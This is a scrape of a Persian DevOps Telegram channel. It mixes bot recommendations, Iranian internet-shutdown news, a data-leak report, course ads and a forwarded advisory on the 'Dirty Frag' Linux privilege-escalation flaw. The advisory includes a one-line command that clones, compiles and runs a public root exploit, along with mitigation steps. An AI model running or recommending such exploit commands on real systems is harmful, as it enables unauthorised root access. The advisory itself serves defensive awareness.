Byteforge / بایــت فورج 🛸
2.05K subscribers
389 photos
120 videos
81 files
384 links
کانالی برای دواپس و علاقه مندان به دواپس
DevOps & DevSecOps
Clouds

🐧🔥 Unique content
Download Telegram
👾رباتایی که بی شک به دردتون میخورن

🔢وصل کردن جیمیل به ربات تلگرام

@GmailBot


🔢هوش مصنوعی های رایگان

@JWGPT3_bot
@TypespaceBot
@ChatGPT_General_Bot


🔢دانلود فایل از گیتهاب

@GithubGitlabDownloader_bot


🔢تبدیل لینک به فایل و فایل به لینک و اپلود فایل ها از طریق تلگرام تو اپلودشنتر ایرانی و...

@LeecherPro_bot


🔢ربات برای ssh زدن به سرور

@EazySSH_bot
@SSHNitoBot

🔢ربات خرید VPS یه صورت ساعتی

@NexNodeBot


🔢استخراج لینک کانفیگ ها از ساب

@URLExtractor_Bot


🔢مدیریت اکانت کلادفلر از طریق ربات تلگرام.

@EazyFlare_bot


🔢ربات برای چک کردن ایپی و اطلاعات ایپی و دامنه (ربات سایت چک هاست)

@CheckHostBot
🔥2
Byteforge / بایــت فورج 🛸 pinned «👾رباتایی که بی شک به دردتون میخورن 🔢وصل کردن جیمیل به ربات تلگرام @GmailBot 🔢هوش مصنوعی های رایگان @JWGPT3_bot @TypespaceBot @ChatGPT_General_Bot 🔢دانلود فایل از گیتهاب @GithubGitlabDownloader_bot 🔢تبدیل لینک به فایل و فایل به لینک و اپلود فایل ها از…»
From April 24 onward, your interactions with GitHub Copilot—including inputs, outputs, code snippets, and associated context—may be used to train and enhance AI models unless you opt out.


کوپایلت از ۴ اردیبهشت از دیتاهای شما برای ترین استفاده خواهد کرد، اگر نمی‌خواید:

1) Go to GitHub Account Settings
2) Select Copilot
3) Choose whether to allow your data to be used for AI model training
👍21
🔴وزیر ارتباطات:اینترنت بین‌الملل تا پایان رسمی جنگ وصل نخواهد شد
😇5🗿2😱1
♨️یک خبرگزاری نزدیک به وزارت ارتباطات: اینترنت از امروز به‌صورت تدریجی وصل می‌شود

خبرگزاری «سیتنا» در خبری نوشته: «با پیگیری‌ها و نامه‌نگاری‌های انجام‌شده، اینترنت بین‌الملل از امروز به صورت هدفمند و تدریجی متصل خواهد شد.»

لازم به ذکر است که «ستار هاشمی»، بهمن‌ماه سال گذشته، مدیر مسئول رسانه سیتنا را به‌عنوان عضو غیر موظف هیئت عامل سازمان فناوری اطلاعات منصوب کرده بود.
🤨3🌚1😐1
🚨 نشت جدید: افشای گسترده اطلاعات هویتی و مهاجرتی کاربران اپلای جرمنی

🔍 مجموعه‌ای در حدود 32 گیگابایت از اطلاعات مربوط به پلتفرم «اپلای جرمنی» که در حوزه مهاجرت تحصیلی و آوسبیلدونگ به آلمان فعالیت دارد، در نتیجه‌ی پیکربندی نادرست تنظیمات امنیتی توسط هکر/هکرها استخراج و منتشر شده است. این مجموعه شامل اطلاعات درخواست‌دهندگان، پذیرفته‌شدگان و ردشدگان بوده و مواردی نظیر نام و نام خانوادگی، شماره ملی، تاریخ تولد، نام پدر، شماره تلفن، آدرس ایمیل، کلمه عبور، عکس پرسنلی، اسکن قرارداد، تصویر پاسپورت، ترجمه مدارک، مدرک زبان، انگیزه‌نامه، رزومه، فرم‌های مربوط به سفارت و سایر داده‌های مرتبط را در بر می‌گیرد.

📌 این نشت می‌تواند منجر به سرقت هویت، سوءاستفاده از مدارک هویتی و مهاجرتی، دسترسی غیرمجاز به حساب‌ها، کلاهبرداری هدفمند و حتی سوءاستفاده از اطلاعات شخصی در فرآیندهای اداری شود. به افراد توصیه می‌شود رمزهای عبور خود را فوراً تغییر دهند، مراقب تماس‌ها و ایمیل‌های مشکوک باشند و در صورت امکان مدارک حساس خود را پیگیری و از سوءاستفاده احتمالی جلوگیری کنند.

صحت داده‌های منتشرشده در بررسی نمونه‌ای تایید شد!

🆔 @leakfarsi
😁2😱2👍1😢1
Forwarded from Abbaz channel (𝑴𝒆𝒉𝒓𝒔𝒉𝒂𝒅)
کمتر کسی از «هزینه پنهان برای تیم‌های فنی» حرف می‌زند

🔹در آمارهای کلان، از زیان ملی می‌گویند؛ اما در سکوت این خاموشی، یک طبقه فراموش‌شده وجود دارد: تیم‌های فنی.
آدم‌هایی که باید سرویس را بالا نگه دارند، در حالی که اینترنت پایین کشیده شده است.
آدم‌هایی که باید پاسخ مشتری را بدهند، در حالی که خودشان هیچ پاسخ روشنی ندارند.
آدم‌هایی که باید incident را جمع کنند، بی‌آنکه به ابزارهای معمول مانیتورینگ، ورژن کنترل، رجیستری، مستندات یا ارتباط پایدار دسترسی داشته باشند.

🔹قطع اینترنت، فقط کاربر نهایی را معطل نمی‌کند؛ مغز متفکر عملیات را فرسوده می‌کند.
هر ساعت قطعی، صدها ساعت استرس، حدس و فرسودگی روانی برای مهندسان می‌سازد.
در این میان، هیچ‌کس از این تیم‌ها نمی‌پرسد هزینه واقعی این بی‌ثباتی چیست:
چند نفر مهاجرت شغلی می‌کنند؟
چند تیم از هم می‌پاشند؟
چند پروژه برای همیشه از نقشه حذف می‌شوند؟

🔹وقتی اینترنت را قطع می‌کنید، در واقع دارید به نیروی متخصص می‌گویید:
اینجا جایی نیست که بتوانی بر مبنای دانش، نظم و پیش‌بینی‌پذیری کار کنی.
و این، خسارتی است که در هیچ گزارش رسمی کامل دیده نمی‌شود، اما سال‌ها از آینده فنی کشور کم می‌کند.

#اینترنت

@devops_tabriz
💔5👍1🦄1
از اتفاقات دی ماه من هیچ پست و محتوایی در راستای تاپیک اصلی کانال کار نکردم 😕💔

4 ماه گذشت..
خیلی ها تعدیل شدن
خیلی ها وضعیتشون نامعلومه
خیلی استارتاپا و شرکتا هم کلا بستن

ما از آخرای فروردین برگشتیم سرکار بصورت حضوری تو شرکت
منتها خیلی شرایط نسبت به 2 ماه پیش فرق کرده کار به سختی در نبود اینترنت جلو میره و همه دوستانی که تو بخش فنی کار میکنن واقعا کلافه و عصبی ان 🤦‍♂
شرایط تاکی میخواد اینجوری بمونه واقعا برای من یکی تشخیص داده نمیشه
💔51👍1
شرکت‌هایی مثل Netflix با استفاده از Chaos Engineering عمداً سرویس‌های production رو fail میکنن مثلاً با Chaos Monkey تا resilience واقعی سیستم رو بسنجن
خلاصه‌اش If it doesn’t break under your control, it will break in production.

فکت دواپسی 🤷
3🆒1
🚀 پکیج کامل دوره آموزش DevOps | پروژه‌محور همراه با کتاب‌های فارسی 🚀

آیا آماده‌اید وارد دنیای DevOps شوید؟ یکی از پردرآمدترین مهارت‌های IT با فرصت‌های شغلی عالی در شرکت‌های بین‌المللی.

📚 محتوای دوره:

🔹 آشنایی با زیرساخت‌های DevOps

🔹 مفاهیم و ابزارهای لینوکس در DevOps

🔹 Docker و مدیریت کانتینرها

🔹 پیاده‌سازی Kubernetes

🔹 مانیتورینگ در DevOps

🔹 Git و مدیریت کد

🔹 Maven در DevOps

🔹 اتوماسیون با Jenkins

🔹 برنامه‌نویسی Python برای DevOps

🔹 مدیریت پیکربندی با Ansible

🔹 Terraform

🔹 CI/CD با GitLab

🔹 پیاده‌سازی در AWS

🔹 پیاده‌سازی در Azure

🔹 پیاده‌سازی در Google Cloud

🎯 مزایا:

پروژه‌محور

همراه با کتاب‌های فارسی

آفلاین و قابل دانلود

پشتیبانی در تلگرام

مناسب ورود به بازار کار

💰 قیمت پکیج:

12 میلیون و 900 هزار تومان

🔥 با 20٪ تخفیف:

10 میلیون و 320 هزار تومان

💳 امکان پرداخت اقساطی در 3 قسط

📌 ثبت‌نام و مشاوره:

📩 @Fariborz_Fallahzadeh

🌟 سیلابس کامل:

https://t.me/FallahzadehCourses/6
❤‍🔥2
Fallahzadeh Academy | Courses
🚀 پکیج کامل دوره آموزش DevOps | پروژه‌محور همراه با کتاب‌های فارسی 🚀 آیا آماده‌اید وارد دنیای DevOps شوید؟ یکی از پردرآمدترین مهارت‌های IT با فرصت‌های شغلی عالی در شرکت‌های بین‌المللی. 📚 محتوای دوره: 🔹 آشنایی با زیرساخت‌های DevOps 🔹 مفاهیم و ابزارهای لینوکس…
رفقا سلام روزتون بخیر
اگر قصد یادگیری کامل و الفبای DevOps رو دارید دوست و همکار عزیزم استاد فلاح زاده
یه دوره کامل آماده کردن که میتونید تهیه کنید و کامل از 0تا100 دوره رو یاد بگیرید .
شرایط خرید :
دوره بصورت افلاین هستن و قابل دانلود از همه مهمتر
پشتیبانی کامل خود استاد و مدرس رو داره
مبلغ کل دوره 12,900 میلیون تومانه که با خرید از طرف کانال خودمون 20درصد تخفیف اعمال میشه
دوره امکان خرید اقساطی در 3 قسط رو داره که براتون سخت نباشه پرداختش
و از همه مهمتر از طریق خود استاد فلاح زاده میتونید وارد بازار بشید و معرف شما باشه در پایان دوره

این دوره الفبای کامل دواپس رو بهتون یاد میده که وارد بازار کار بشید و یه دوره اشانتیون نتورک پلاس هم ارائه میشه بصورت رایگان

مشاوره و خرید از طریق آیدی زیر :

@Fariborz_Fallahzadeh
👌2
Forwarded from gooyban🦆
بازهم آسیب‌پذیری تمام لینوکس‌ها از ۲۰۱۷: Dirty Frag

آسیب‌پذیری تازه‌ای در ادامه‌ی Dirty Pipe و Copy Fail پیدا شده، که با ترکیب دو باگ امنیتی (xfrm-ESP و RxRPC در Page Cache) در بسیاری از توزیع‌ها می‌تونه دسترسی root بگیره.

می‌تونید روی سیستم خودتون هم امتحانش کنید:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

پس از اینکه انجامش دادید، Page Cache شما آلوده شده با اجرای دستور:
echo 3 > /proc/sys/vm/drop_caches

یا ری‌استارت کردن سیستم به حالت پیش برگردونیدش.

راهکار:
تا پچ امنیتی برای توزیعتون بیاد می‌تونید با این دستور ماژولهایی که این آسیب‌پذیری در اونها وجود داره را غیرفعال کنید و Page cache را پاک کنید:

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"


روی این سیستم‌ها تا الان تست شده و آسیب‌پذیر بودند:
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64


اگه شبیه CopyFail به نظر میاد خودشون گفتن که:
ایده شروع این تحقیق از آسیب‌پذیری Copy Fail گرفته شده. به‌طور مشخص، بخش xfrm-ESP در زنجیره آسیب‌پذیری Dirty Frag از همان نقطه ضعف مشابه Copy Fail استفاده می‌کند. اما تفاوت مهم این است که این آسیب‌پذیری مستقل از وجود ماژول algif_aead فعال می‌شود.

به عبارت دیگر، حتی اگر روی سیستم راهکار شناخته‌شده مقابله با Copy Fail (مثل غیرفعال کردن algif_aead) اعمال شده باشد، باز هم لینوکس شما در برابر Dirty Frag آسیب‌پذیر باقی می‌ماند.


⌨️ توضیحات بیشتر در گیت‌هاب

تمام این اتفاق‌ها داره در زمانی میوفته که اینترنت ایران همچنان قطعه، سیستم‌ها به روز نشدند، با خبر شدن از این باگ‌ها و برطرف کردنشون به مراتب سخت‌تر خواهد بود.

✈️ به این لیست (از کانال سهراب) Dirty Frag را هم اضافه کنید.


🎮 @gooyban
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from localhost (Yousef Taheri)
‏گوگل یه دوره رایگان ۵ روزه گذاشته واسه Vibe Coding و ساخت ایجنت و پروتوتایپ!
‏دوره بعدیش از June شروع میشه. از لینک زیر ثبت‌نام کنید:
https://www.kaggle.com/competitions/5-day-ai-agents-intensive-vibecoding-course-with-google